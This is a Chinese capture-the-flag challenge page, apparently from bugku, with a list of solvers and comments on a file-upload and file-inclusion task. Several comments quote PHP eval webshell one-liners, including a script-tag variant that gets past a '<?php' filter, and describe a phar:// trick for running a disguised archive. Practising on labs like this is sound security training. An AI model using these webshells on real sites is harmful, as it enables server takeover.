评分(5)
解题动态
xixixixi 攻破了该题 16小时前
lotuswhite 攻破了该题 20小时前
gyssong 攻破了该题 21小时前
coolsword2023 攻破了该题 1天前
ba7npw 攻破了该题 2天前
l个0个l 攻破了该题 3天前
codehub 攻破了该题 3天前
sushezhong 攻破了该题 3天前
111jing 攻破了该题 6天前
sstt 攻破了该题 7天前
15346899030 攻破了该题 9天前
qq4455599 攻破了该题 10天前
JustDive0NoBar 攻破了该题 12天前
jadxbug 攻破了该题 12天前
edcrfvtgb 攻破了该题 13天前
18396451294 攻破了该题 13天前
0xSec 攻破了该题 13天前
路过的猫涅 攻破了该题 14天前
MOGO 攻破了该题 14天前
评论
陈江川0118 2年前
举报
无非就是换了个写一句话木马方式
yes1yi 2年前
举报
有人把flag删掉了?
a2cai 2年前
举报
不是很懂,试过<?php @eval($_POST['shell'])?>放到jpg里,然后上传后包含它,打开F12发现它其实会echo它?但会对一些字符进行转换啥的,我试的<?php和?>会转换成 _ ,然后 < 和 > 分别转换为<!-- 和-->,就不知道为啥用<script language='php'>@eval($_POST[
yswdlll 2年前
举报
phar能把压缩文件解压读取,即使这个压缩文件的后缀名改了也可以。。所以上传一个getshell的压缩文件,后缀名改成jpg或者其他。。然后通过phar://读取
onerm 2年前
举报
学到了
ycfhw1 2年前
举报
flag没被删,只是换了位置而已,这么看的话,还是连菜刀查找效率更高
hoshino 2年前
举报
哥连不上
4thrun 2年前
举报
1. 注意使用php脚本的文件包含,直接访问图片是没用的。这里index.php存在文件包含。 2. <?php ? >被过滤了
Qingwan 1年前
举报
大佬,怎么知道<?php ?>被过滤的捏
guozi 2年前
举报
喜欢有马的同学们,其实可以这样的 <script language="php">@eval($_POST[pass])</script>
Seveen1 2年前
举报
FLAG找得到,但是蚁剑连接上了后是一串乱码的文件,最后我是通过POST的内容直接进行命令执行
现在有点开心了 2年前
举报
哈哈,手动蚁剑
6lack 3年前
举报
bugku这种生成的一次性临时环境咋可能被删flag嘛。。。找不到flag的认真找找吧
丶我亚索贼六 3年前
举报
过滤了<? php ?>